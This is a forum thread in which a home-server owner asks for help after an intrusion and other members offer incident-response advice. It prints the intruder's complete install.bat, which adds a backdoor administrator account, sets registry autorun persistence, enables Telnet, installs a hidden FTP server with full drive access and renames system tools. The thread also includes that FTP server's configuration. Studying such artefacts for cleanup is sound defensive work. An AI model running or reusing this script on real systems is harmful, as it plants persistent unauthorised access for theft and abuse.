Hacked !!!!!!
Page 1 of 7 123 ... LastLast
Results 1 to 10 of 65

Thread: Hacked !!!!!!

  1. #1
    Senior Member
    Join Date
    Aug 2001
    Posts
    136

    Hacked !!!!!!

    Hey guys. KapperDog here. Some of you may remember me. I've been a member here for a few years and I read more than I post.

    Need a favor, please

    I am playing with a web server I set up on my home PC. It runs Win2KPro, Savant Web Server and BulletProof FTP.

    The FTP was not running at the time of the hack but Savant was.

    I'm not sure if I caught him in progress or if he just left a clue behind by accident but, this morning when I checked the box, it had a CMD window open and this is what was in the box.

    Sure looks like I was hacked to me. LOL

    Can anyone tell me what damage was done and (most importantly) am I still compromised.

    Thanks for everything.

    Hey, where's Hogfly? How's his gas? LMAO

    Anyway......

    Code:
    C:\WINNT\system32\spool\prtprocs\w32x86>set  key=1
    
    C:\WINNT\system32\spool\prtprocs\w32x86>ver   | find "2000"   1>nul
    
    C:\WINNT\system32\spool\prtprocs\w32x86>if not errorlevel 1 set key=2
    
    C:\WINNT\system32\spool\prtprocs\w32x86>c:
    
    C:\WINNT\system32\spool\prtprocs\w32x86>attrib -s -h -r c:\winnt\system32\spool\
    prtprocs\w32x86\svchost.exe
    
    C:\WINNT\system32\spool\prtprocs\w32x86>attrib -s -h -r c:\winnt\system32\spool\
    prtprocs\w32x86\servudaemon.ini
    
    C:\WINNT\system32\spool\prtprocs\w32x86>attrib -s -h -r c:\winnt\system32\spool\
    prtprocs\w32x86\install.bat
    
    C:\WINNT\system32\spool\prtprocs\w32x86>attrib -s -h -r c:\winnt\system32\spool\
    prtprocs\w32x86\dump0n.txt
    
    C:\WINNT\system32\spool\prtprocs\w32x86>attrib -s -h -r c:\winnt\system32\spool\
    prtprocs\w32x86\ohq.exe
    
    C:\WINNT\system32\spool\prtprocs\w32x86>attrib -s -h -r c:\winnt\system32\spool\
    prtprocs\w32x86\JAsfv.dll
    
    C:\WINNT\system32\spool\prtprocs\w32x86>attrib -s -h -r c:\winnt\system32\spool\
    prtprocs\w32x86\JAsfv.ini
    
    C:\WINNT\system32\spool\prtprocs\w32x86>attrib -s -h -r c:\winnt\system32\spool\
    prtprocs\w32x86\TzoLibr.dll
    
    C:\WINNT\system32\spool\prtprocs\w32x86>net user GLoB peupo3nn/add  /yes
    The user name could not be found.
    
    More help is available by typing NET HELPMSG 2221.
    
    
    C:\WINNT\system32\spool\prtprocs\w32x86>net LOCALGROUP administrators GLoB /add
    
    There is no such global user or group: GLoB.
    
    More help is available by typing NET HELPMSG 3783.
    
    
    C:\WINNT\system32\spool\prtprocs\w32x86>net group "Domain Admins" GLoB /add
    This command can be used only on a Windows 2000 Domain Controller.
    
    More help is available by typing NET HELPMSG 3515.
    
    
    C:\WINNT\system32\spool\prtprocs\w32x86>echo REGEDIT4     1>>ins.reg
    
    C:\WINNT\system32\spool\prtprocs\w32x86>echo [HKEY_LOCAL_MACHINE\SOFTWARE\Micros
    oft\Windows\CurrentVersion\Run] 1>>ins.reg
    
    C:\WINNT\system32\spool\prtprocs\w32x86>echo  "MDM"="c:\winnt\system32\spool\prt
    procs\w32x86\svchost.exe" 1>>ins.reg
    
    C:\WINNT\system32\spool\prtprocs\w32x86>echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentC
    ontrolSet\Control\Lsa\]    1>>ins.reg
    
    C:\WINNT\system32\spool\prtprocs\w32x86>echo "restrictanonymous"=dword:00000002
       1>>ins.reg
    
    C:\WINNT\system32\spool\prtprocs\w32x86>echo [HKEY_LOCAL_MACHINE\SOFTWARE\Micros
    oft\TelnetServer\1.0\]  1>>ins.reg
    
    C:\WINNT\system32\spool\prtprocs\w32x86>echo "NTLM"=dword:00000001    1>>ins.reg
    
    
    C:\WINNT\system32\spool\prtprocs\w32x86>echo [HKEY_LOCAL_MACHINE\SYSTEM\ControlS
    et001\Services\TlntSvr\]    1>>ins.reg
    
    C:\WINNT\system32\spool\prtprocs\w32x86>echo "Start"=dword:00000002    1>>ins.re
    g
    
    C:\WINNT\system32\spool\prtprocs\w32x86>echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentC
    ontrolSet\Services\LanmanServer\Parameters] 1>>ins.reg
    
    C:\WINNT\system32\spool\prtprocs\w32x86>echo "AutoShareServer"=dword:00000000
    1>>ins.reg
    
    C:\WINNT\system32\spool\prtprocs\w32x86>echo "AutoShareWks"=dword:00000000   1>>
    ins.reg
    
    C:\WINNT\system32\spool\prtprocs\w32x86>echo [HKEY_LOCAL_MACHINE\SOFTWARE\Micros
    oft\Windows NT\CurrentVersion\Winlogon] 1>>ins.reg
    
    C:\WINNT\system32\spool\prtprocs\w32x86>echo "DontDisplayLastUserName"=dword:000
    00001   1>>ins.reg
    
    C:\WINNT\system32\spool\prtprocs\w32x86>echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentC
    ontrolSet\Services\lanmanserver\parameters]   1>>ins.reg
    
    C:\WINNT\system32\spool\prtprocs\w32x86>echo "RestrictNullSessAccess"=dword:0000
    0001   1>>ins.reg
    
    C:\WINNT\system32\spool\prtprocs\w32x86>regedit /S ins.reg
    
    C:\WINNT\system32\spool\prtprocs\w32x86>del ins.reg
    
    C:\WINNT\system32\spool\prtprocs\w32x86>svchost.exe /i
    
    C:\WINNT\system32\spool\prtprocs\w32x86>net stop Serv-U
    The Serv-U FTP Server service is not started.
    
    More help is available by typing NET HELPMSG 3521.
    
    
    C:\WINNT\system32\spool\prtprocs\w32x86>net start Serv-U
    The Serv-U FTP Server service is starting.
    The Serv-U FTP Server service was started successfully.
    
    
    C:\WINNT\system32\spool\prtprocs\w32x86>net stop tlntsvr
    The Telnet service is not started.
    
    More help is available by typing NET HELPMSG 3521.
    
    
    C:\WINNT\system32\spool\prtprocs\w32x86>net start tlntsvr
    The Telnet service is starting.
    The Telnet service was started successfully.
    
    
    C:\WINNT\system32\spool\prtprocs\w32x86>net stop "messenger"
    The Messenger service is not started.
    
    More help is available by typing NET HELPMSG 3521.
    
    
    C:\WINNT\system32\spool\prtprocs\w32x86>net stop "netbios"
    
    The NetBIOS Interface service was stopped successfully.
    
    
    C:\WINNT\system32\spool\prtprocs\w32x86>net share /delete C$ /y
    C$ was deleted successfully.
    
    
    C:\WINNT\system32\spool\prtprocs\w32x86>net share /delete D$ /y
    This shared resource does not exist.
    
    More help is available by typing NET HELPMSG 2310.
    
    
    C:\WINNT\system32\spool\prtprocs\w32x86>net share /delete E$ /y
    This shared resource does not exist.
    
    More help is available by typing NET HELPMSG 2310.
    
    
    C:\WINNT\system32\spool\prtprocs\w32x86>net share /delete F$ /y
    This shared resource does not exist.
    
    More help is available by typing NET HELPMSG 2310.
    
    
    C:\WINNT\system32\spool\prtprocs\w32x86>net share /delete ADMIN$
    Users have open files on ADMIN$.  Continuing the operation will force the files
    closed.
    
    Do you want to continue this operation? (Y/N) [N]:
    The cursor is still flashing at this prompt waiting for a reply.

    Any advice?

    Thanks again, guys.
    KapperDog

  2. #2
    AO Ancient: Team Leader
    Join Date
    Oct 2002
    Posts
    5,197
    well......

    Busy little ratbag wasn't he......<s>

    Unfortunately you don't seem to have all the activity..... The command history buffer must have begun to overwrite itself..... You do have a few clues though that me help you clean up without a complete format and reinstall.

    His password for this hack is peupo3nn

    much info and stuff he did is in C:\WINNT\system32\spool\prtprocs\w32x86

    There is a batch file in the w32x86 dir called install.bat that is worth looking through.....

    There is a txt file called Dump0n.txt that is also worth a close look.

    servudaemon.ini might also show some interesting info as would JAsfv.ini

    You have a definitive list of the registry changes he made....Undo them

    close the services he started

    dunno why he would stop netbios..... That's an odd one.....

    He deleted your administrative shares.... you should probably leave them deleted unless you use them.

    It's up to you if you simply delete the files he put in C:\WINNT\system32\spool\prtprocs\w32x86 or just keep them on a floppy to experiment with.

    I'd also put a packets sniffer watching the machine for a few days
    Don\'t SYN us.... We\'ll SYN you.....
    \"A nation that draws too broad a difference between its scholars and its warriors will have its thinking done by cowards, and its fighting done by fools.\" - Thucydides

  3. #3
    Senior Member
    Join Date
    Aug 2001
    Posts
    136
    Well, it definitely looks like a real hack. It looks like he installed ServU ftp on my box.

    This is the first time I've been hacked. Kinda fun. hehe

    Although, I want to make sure my entire LAN is not in danger. It would appear he intends to return and steal, not just destroy. (Otherwise, I assume I would have formated HDD's by now.

    Hmmmmm? maybe, I should lay in wait. LOL Unfirtunately, I don't know as much as I should about this stuff.

    Anyway, I hope you don't mind my multiple posts but, I'm going to post what I find as I find it. If someone want to pick up and help out, I sure would be greatful. Thanks again.

    Here is the servUDaemon.ini from the Seru FTP install

    Code:
    [GLOBAL]
    Version=3.0.0.17
    RegistrationKey=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAawEEBDOq4z0PJw8nAgAERHVtcAhQdWJAU3RybwdFQ0xpUFNF
    ProcessID=596
    MaxNrUsers=10
    CheckAnonPass=1
    DirCacheEnable=0
    AntiHammer=1
    AntiHammerTries=10
    AntiHammerBlock=1800
    PacketTimeOut=300
    [EXTERNAL]
    EventHookDLL1=JAsfv.dll
    [DOMAINS]
    Domain1=0.0.0.0||6969|0nlineHQ|1
    [Domain1]
    ReplyHello=(¯`·._.·[ 0nline.HQ ]·._.·´¯)
    ReplyHelp=(¯`·._.·[ No Help avering ]·._.·´¯)
    ReplyNoAnon=(¯`·._.·[ No an0nym0us acc0unt ]·._.·´¯)
    ReplyNoCredit=(¯`·._.·[ No en0ught Credits ]·._.·´¯)
    ReplySYST=(¯`·._.·[ Hax0r = 0nline.HQ CreW ]·._.·´¯)
    ReplyTooMany=(¯`·._.·[ 421: ToO MuCh LeeCheRz / BaCk s00n ]·._.·´¯)
    ReplyDown=(¯`·._.·[ Offline : BaCk s00n ]·._.·´¯)
    ReplyOffline=(¯`·._.·[ Offline : BaCk s00n ]·._.·´¯)
    LogSystemMes=0
    LogSecurityMes=0
    LogGETs=0
    LogPUTs=0
    MaxNrUsers=10
    User1=admin|1|0
    SignOn=c:\winnt\system32\spool\prtprocs\w32x86\dump0n.txt
    User2=fxp|1|0
    User3=leech|1|0
    [USER=admin|1]
    Password=vv3C067E6E3AD1C12C6D5CF9BE14CD5B19
    HomeDir=c:\
    AlwaysAllowLogin=1
    TimeOut=1000020
    Maintenance=System
    Access1=c:\|RWAMELCDP
    Access1=c:\|RWAMELCDP
    Access2=d:\|RWAMELCDP
    Access3=e:\|RWAMELCDP
    Access4=f:\|RWAMELCDP
    Access5=g:\|RWAMELCDP
    Access6=h:\|RWAMELCDP
    Access7=i:\|RWAMELCDP
    Access8=j:\|RWAMELCDP
    Access9=k:\|RWAMELCDP
    Access10=l:\|RWAMELCDP
    Access11=m:\|RWAMELCDP
    Access12=n:\|RWAMELCDP
    Access13=o:\|RWAMELCDP
    Access14=p:\|RWAMELCDP
    Access15=q:\|RWAMELCDP
    Access16=r:\|RWAMELCDP
    Access17=s:\|RWAMELCDP
    Access18=t:\|RWAMELCDP
    Access19=u:\|RWAMELCDP
    Access20=v:\|RWAMELCDP
    Access21=w:\|RWAMELCDP
    Access22=x:\|RWAMELCDP
    Access23=y:\|RWAMELCDP
    Access24=z:\|RWAMELCDP
    [USER=fxp|1]
    Password=rjAF7C43174907EE9645895D981D10A046
    HomeDir=c:\winnt\system32\spool\prtprocs\w32x86\stro
    RelPaths=1
    TimeOut=600
    Access1=c:\winnt\system32\spool\prtprocs\w32x86\stro|RWAMLCDP
    [USER=leech|1]
    Password=khD56952C34B3B066BF0F400BD3D0B2B97
    HomeDir=c:\winnt\system32\spool\prtprocs\w32x86\stro
    RelPaths=1
    TimeOut=600
    Access1=c:\winnt\system32\spool\prtprocs\w32x86\stro|RLP
    Thanks Tiger. I was looking thru that directory while you were posting. Lottsa neat stuff.

    Most interesting is the install.bat file.

    So far, all I have done is rename all .exe's and .bat's to .bakexe and .bakbat.

    I don't want to delete anything because this is a real opportunity for me to learn but, I'm afraid. LOL

    I guess, the 1 thing I should focus on first is how he got in and how to stop him (and other) from returning the same way.

    Any suggestions on this? Remember, I'm a newbie. LOL

    I have 10 boxes on this LAN and I don't want to loose all 10 of them. LOL

    Hmmm, I may be in more trouble than I thought. Well, we shall see.

    Anyway, the install.bat

    C:\WINNT\system32\spool\prtprocs\w32x86

    Code:
    set  key=1 
    ver | find "2000" > nul 
    if not errorlevel 1 set key=2
    c:
    attrib -s -h -r c:\winnt\system32\spool\prtprocs\w32x86\svchost.exe
    attrib -s -h -r c:\winnt\system32\spool\prtprocs\w32x86\servudaemon.ini
    attrib -s -h -r c:\winnt\system32\spool\prtprocs\w32x86\install.bat
    attrib -s -h -r c:\winnt\system32\spool\prtprocs\w32x86\dump0n.txt
    attrib -s -h -r c:\winnt\system32\spool\prtprocs\w32x86\ohq.exe
    attrib -s -h -r c:\winnt\system32\spool\prtprocs\w32x86\JAsfv.dll
    attrib -s -h -r c:\winnt\system32\spool\prtprocs\w32x86\JAsfv.ini
    attrib -s -h -r c:\winnt\system32\spool\prtprocs\w32x86\TzoLibr.dll
    
    net user GLoB peupo3nn/add  /yes
    net LOCALGROUP administrators GLoB /add 
    net group "Domain Admins" GLoB /add
    
    echo REGEDIT4  1>>ins.reg  
    echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]>>ins.reg
    echo  "MDM"="c:\winnt\system32\spool\prtprocs\w32x86\svchost.exe">>ins.reg
    echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\] >> ins.reg  
    echo "restrictanonymous"=dword:0000000%key% >> ins.reg  
    echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\TelnetServer\1.0\] >> ins.reg
    echo "NTLM"=dword:00000001 >> ins.reg  
    echo [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\TlntSvr\] >> ins.reg  
    echo "Start"=dword:00000002 >> ins.reg  
    echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]>> ins.reg
    echo "AutoShareServer"=dword:00000000>> ins.reg  
    echo "AutoShareWks"=dword:00000000>> ins.reg  
    echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]>> ins.reg
    echo "DontDisplayLastUserName"=dword:00000001>> ins.reg  
    echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\lanmanserver\parameters]>> ins.reg  
    echo "RestrictNullSessAccess"=dword:00000001>> ins.reg  
    
    regedit /S ins.reg
    del ins.reg
    svchost.exe /i
    net stop Serv-U
    net start Serv-U
    net stop tlntsvr
    net start tlntsvr
    net stop "messenger" 
    net stop "netbios" 
    net share /delete C$ /y 
    net share /delete D$ /y 
    net share /delete E$ /y 
    net share /delete F$ /y 
    net share /delete ADMIN$ 
    net share /delete IPC$ 
    
    net stop "Remote Registry Service" 
    net stop "Computer Browser" 
    net stop "REMOTE PROCEDURE CALL" 
    net stop "REMOTE PROCEDURE CALL SERVICE" 
    net stop "Remote Access Connection Manager" 
    net stop "telnet" 
    mkdir c:\winnt\Recycled\.glob
    cd c:\winnt\system32\
    ren net.exe neo.exe
    ren tftp.exe neo2.exe
    ren ftp.exe neo3.exe
    ren at.exe neo4.exe
    c:\winnt\system32\spool\prtprocs\w32x86\.glob\svchost.exe /u /h
    KapperDog

  4. #4
    AO Ancient: Team Leader
    Join Date
    Oct 2002
    Posts
    5,197
    I've heard of the HQ CreW somewhere before..... I just can't remmber where......
    Don\'t SYN us.... We\'ll SYN you.....
    \"A nation that draws too broad a difference between its scholars and its warriors will have its thinking done by cowards, and its fighting done by fools.\" - Thucydides

  5. #5
    Senior Member
    Join Date
    Aug 2001
    Posts
    136
    Code:
    C:\WINNT\system32\spool\prtprocs\w32x86 
    
     Directory of C:\WINNT\system32\spool\prtprocs\w32x86
    
    02/17/2003  11:23p      <DIR>          .
    02/17/2003  11:23p      <DIR>          ..
    02/02/2003  03:44p               1,685 dump0n.txt
    02/07/2003  07:54p               2,541 install.bakbat
    01/16/2002  08:07p              69,632 JAsfv.dll
    02/06/2003  08:24p               2,739 JAsfv.ini
    02/07/2003  02:16p             632,809 ohq.bakexe
    02/17/2003  03:53p               2,091 ServUDaemon.ini
    02/17/2003  03:44p                 584 ServUStartUpLog.txt
    12/07/1999  07:00a               6,928 sfmpsprt.dll
    02/17/2003  03:54p      <DIR>          stro
    02/04/2003  08:45p           1,930,752 svchost.bakexe
    10/16/2002  09:07p              36,864 TzoLibr.dll
                  10 File(s)      2,686,625 bytes
                   3 Dir(s)  108,350,550,016 bytes free
    
    C:\WINNT\system32\spool\prtprocs\w32x86>
    dumpOn.txt

    Code:
    
    ¨¨°o.O0Oo+====================================+oO0O.o°¨¨
              
                       <-·´¯`·._.·´¯) Info Utilisateur (¯`·._.·´¯`·->
    
    --={ Tu es sur le disque %Disk
    --={ Ton ip %IP 
    --={ Utilisateurs Connectés:                %UNow
    --={ Nombre d'utilisateurs Acceptés:  %MaxUsers
    --={ Nombre d'utilisateurs connectés depuis le lancement du serveur: %UAll
    --={ Utilisateurs connectés sur le serveur durant les dernieres 24H:      %U24h
    
    ¨¨°o.O0Oo+====================================+oO0O.o°¨¨
    
                       <-·´¯`·._.·´¯) Descriptif Serveur (¯`·._.·´¯`·->
    
    --={ Heure Local  %Time
    --={ Date Local    %Date 
    --={ Le serveur est lancé depuis 
    --={ %ServerDays Jours, %ServerHours Heures, %ServerMins Mins, %ServerSecs Secs
    
    ¨¨°o.O0Oo+====================================+oO0O.o°¨¨
    
                       <-·´¯`·._.·´¯) Statistique Serveur (¯`·._.·´¯`·->
    
    --={ Espace Disque Disponible:         %DFree Ko
    --={ Téléchargement Total:                         %ServerKbDown Ko 
    --={ Envoie Total:                                          %ServerKbUp Ko
    --={ Bande Passante Moyenne:             %ServerAvg Ko/sec
    --={ Bande Passante Actuelle:              %ServerKBps Ko/sec
    --={ Nombres de Fichiés Téléchargés:          %FDown
    --={ Nombres de Fichiés Envoyés:                %FUp
    
    ¨¨°o.O0Oo+====================================+oO0O.o°¨¨
    
                       <-·´¯`·._.·´¯) Ratio Stat Serveur (¯`·._.·´¯`·->
    
    --={ Ratio Up :         %RatioUp Ko
    --={ Ratio Down :                         %RatioDown  Ko 
    --={ Credits restant:                                         %RatioCredit
    
    ¨¨°o.O0Oo+====================================+oO0O.o°¨¨
    KapperDog

  6. #6
    AO Ancient: Team Leader
    Join Date
    Oct 2002
    Posts
    5,197
    Kapper: Ya know what's funny....... I was looking at the first printout you posted and thinking to myself "this is scripted".... LOL..... Now I see the install bat it's the exact set of commands in the same order so this was the install bat running.

    You are right.... We need to find the way in.... What is the architecture of the network.... like

    Internet -> Firewall -> LAN
    |
    v
    DMZ -> Public services

    I need to understand where your vulnerabilities are since clearly he had already copied all the files into place and the install bat prior to him running it and there is no evidence of how or where..... What services are available publicly? Kinda everything you can tell me?

    If you don't feel comfy doing it that publicly....pm me with the info.
    Don\'t SYN us.... We\'ll SYN you.....
    \"A nation that draws too broad a difference between its scholars and its warriors will have its thinking done by cowards, and its fighting done by fools.\" - Thucydides

  7. #7
    Since he started an FTP service his plan is probably to use your box as some sort of warez server.
    I would go with the intrusion detection, packet capturing software.
    BTW do you have timestamps for when this happened ?
    Do you run a firewall ? (You should)
    If you run a firewall you may want to examine the logs. This could give you some info on the whereabouts of the misschief but he is probably proxie-chained.
    Also the telnet service gets started. He might have continued his quest from telnet and forgot to terminate the command session.

    Try disconnecting the other puters on your network if it is possible and monitor the traffic. This way maybe you can catch him while he is at it.

    Just some general advice:
    I googled for 'savant webserver' without the quotes and immediatly got atleast ten links to vulnarabilities in it.
    Are you aware of this ?
    Do you have the latest patches installed ?

    Hope this will help.

  8. #8
    Senior Member
    Join Date
    Aug 2001
    Posts
    136
    I don't have a prob doing it pulicly. This is how we all learn to deal with these little kiddies. LOL

    This should be good for me (thanks to you). Hopefully, if we keep in in the forum, others will learn too.

    OK, I'll describe the network as best I can.

    Since we're starting at the begining, maybe you could give me a little immediate advice.

    Should I shut the serber down? It's only hosting a couple ebay auctions and some other fun stuff. It's there for me to play with and learn. I would like to leave it up but if you say, I should take it down, I will.

    The danger is that I have my home network set up to this and, although, there is nothing of interest there, there is archival data that I would not want to loose.

    Does he seem to have access to my entire LAN?

    OK. Thanks.. my turn

    P4 2.4 /512k RAM/Win2KPro/SP2/Savant Web Server

    Cable ISP/Linksys Router (pass not admin)/IP assigned to servere and IP placed in DMZ

    Hmmm, I'll bet you're going to slap my wrist for that one. I'll bet I should have done individual port forwarding for the web (80) and the FTP (whatever)

    Well, that's what I've got. If you need more, ask.

    I hope this will be an enjoyable and learning experience for us all and, I want to say thanks in advance for any participation.

    Here's the install.bat

    Code:
    set  key=1 
    ver | find "2000" > nul 
    if not errorlevel 1 set key=2
    c:
    attrib -s -h -r c:\winnt\system32\spool\prtprocs\w32x86\svchost.exe
    attrib -s -h -r c:\winnt\system32\spool\prtprocs\w32x86\servudaemon.ini
    attrib -s -h -r c:\winnt\system32\spool\prtprocs\w32x86\install.bat
    attrib -s -h -r c:\winnt\system32\spool\prtprocs\w32x86\dump0n.txt
    attrib -s -h -r c:\winnt\system32\spool\prtprocs\w32x86\ohq.exe
    attrib -s -h -r c:\winnt\system32\spool\prtprocs\w32x86\JAsfv.dll
    attrib -s -h -r c:\winnt\system32\spool\prtprocs\w32x86\JAsfv.ini
    attrib -s -h -r c:\winnt\system32\spool\prtprocs\w32x86\TzoLibr.dll
    
    net user GLoB peupo3nn/add  /yes
    net LOCALGROUP administrators GLoB /add 
    net group "Domain Admins" GLoB /add
    
    echo REGEDIT4  1>>ins.reg  
    echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]>>ins.reg
    echo  "MDM"="c:\winnt\system32\spool\prtprocs\w32x86\svchost.exe">>ins.reg
    echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\] >> ins.reg  
    echo "restrictanonymous"=dword:0000000%key% >> ins.reg  
    echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\TelnetServer\1.0\] >> ins.reg
    echo "NTLM"=dword:00000001 >> ins.reg  
    echo [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\TlntSvr\] >> ins.reg  
    echo "Start"=dword:00000002 >> ins.reg  
    echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]>> ins.reg
    echo "AutoShareServer"=dword:00000000>> ins.reg  
    echo "AutoShareWks"=dword:00000000>> ins.reg  
    echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]>> ins.reg
    echo "DontDisplayLastUserName"=dword:00000001>> ins.reg  
    echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\lanmanserver\parameters]>> ins.reg  
    echo "RestrictNullSessAccess"=dword:00000001>> ins.reg  
    
    regedit /S ins.reg
    del ins.reg
    svchost.exe /i
    net stop Serv-U
    net start Serv-U
    net stop tlntsvr
    net start tlntsvr
    net stop "messenger" 
    net stop "netbios" 
    net share /delete C$ /y 
    net share /delete D$ /y 
    net share /delete E$ /y 
    net share /delete F$ /y 
    net share /delete ADMIN$ 
    net share /delete IPC$ 
    
    net stop "Remote Registry Service" 
    net stop "Computer Browser" 
    net stop "REMOTE PROCEDURE CALL" 
    net stop "REMOTE PROCEDURE CALL SERVICE" 
    net stop "Remote Access Connection Manager" 
    net stop "telnet" 
    mkdir c:\winnt\Recycled\.glob
    cd c:\winnt\system32\
    ren net.exe neo.exe
    ren tftp.exe neo2.exe
    ren ftp.exe neo3.exe
    ren at.exe neo4.exe
    c:\winnt\system32\spool\prtprocs\w32x86\.glob\svchost.exe /u /h
    noodle. I have his IP from the Savant log. 80.14.79.43

    SamSpade didn't give up much. lol

    And, I'm pretty sure that the Linksys router keeps a log by default. I just started playing as a webserver and most of this is pretty new to me.

    As far as Savant, I am using version 3.1

    Like I said, I just put all this up a few weeks ago and I used all current releases so, I believe I have the latest patches for everything. I'll do that same Google search and see what I find. Thanks for the tip.
    KapperDog

  9. #9
    I'd rather be fishing DjM's Avatar
    Join Date
    Aug 2001
    Location
    The Great White North
    Posts
    1,867
    This is just my opinion, but if you can divorce this box from the rest of your servers, I'd leave it up and treat it like a honeypot. If it's up, you may be able to catch him/her red-handed and be able to trace the attack. Again, if this is going to put your other systems at risk, you may want to take it off the wire.

    Cheers:
    DjM

  10. #10
    Member
    Join Date
    Jul 2002
    Posts
    46
    I don't have much to tell you about your network's vulnerabilities (I'm just learning) but you DEFINATELY should back up all data you care about now if you haven't already got it backed up. If you haven't got it backed up already, the intruder might have already corrupted it.

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •